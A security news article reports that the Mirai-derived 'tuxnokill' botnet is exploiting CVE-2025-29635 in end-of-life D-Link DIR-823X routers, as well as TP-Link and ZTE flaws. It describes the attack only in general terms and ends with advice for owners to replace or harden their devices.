Ancient D-Link Routers Hijacked by New “Tuxnokill” Mirai Botnet

Routers that have long been decommissioned from official support have suddenly become the epicenter of a resurgent wave of cyber incursions. Adversaries have begun aggressively exploiting a legacy vulnerability to surreptitiously conscript domestic hardware into a sprawling botnet.

The flaw within the D-Link DIR-823X routers, designated as CVE-2025-29635 (carrying a CVSS score of 8.8), facilitates arbitrary command execution via a meticulously crafted POST request. By merely directing a request to a susceptible endpoint, an interloper can compel the router to execute malicious instructions.

This offensive was identified by Akamai in March 2026. Although the vulnerability was disclosed over a year ago, only recently have empirical instances of exploitation surfaced. This activity was detected through a global tapestry of “honeypots” designed to simulate vulnerable hardware.

The mechanics of the assault are remarkably straightforward. The attackers dispatch a request that forces the device into writable directories, subsequently fetching a script titled dlink.sh from a remote server. Once initiated, this script installs a Mirai-derived malware variant known as tuxnokill. This payload boasts cross-architecture compatibility, rendering it effective against a diverse array of hardware.

The capabilities of the malware mirror the standard operational profile of Mirai. Infected nodes are weaponized for potent distributed denial-of-service (DDoS) campaigns, overwhelming target servers with a deluge of TCP and UDP traffic or a saturated volume of HTTP requests.

The threat collective has not confined its efforts to a single brand. Simultaneously, the group is leveraging CVE-2023-1389 in TP-Link routers alongside a separate remote command execution vulnerability in ZTE ZXV10 H108L devices. The tactical pattern remains consistent across all targets: breach the perimeter, exfiltrate the payload, and entrench the Mirai malware.

The gravity of the situation is compounded by the fact that the affected hardware reached its “End of Life” (EoL) status in November 2024. The manufacturer has ceased the dissemination of security remediations, even in the presence of active threats. Consequently, the final firmware iterations likely remain permanently exposed.

Owners of such antiquated routers are strongly encouraged to consider hardware replacement. As long as these devices remain connected to the network, they may be exploited without the owner’s knowledge. At a minimum, users should disable remote management interfaces, rotate default administrative credentials, and meticulously monitor device configurations.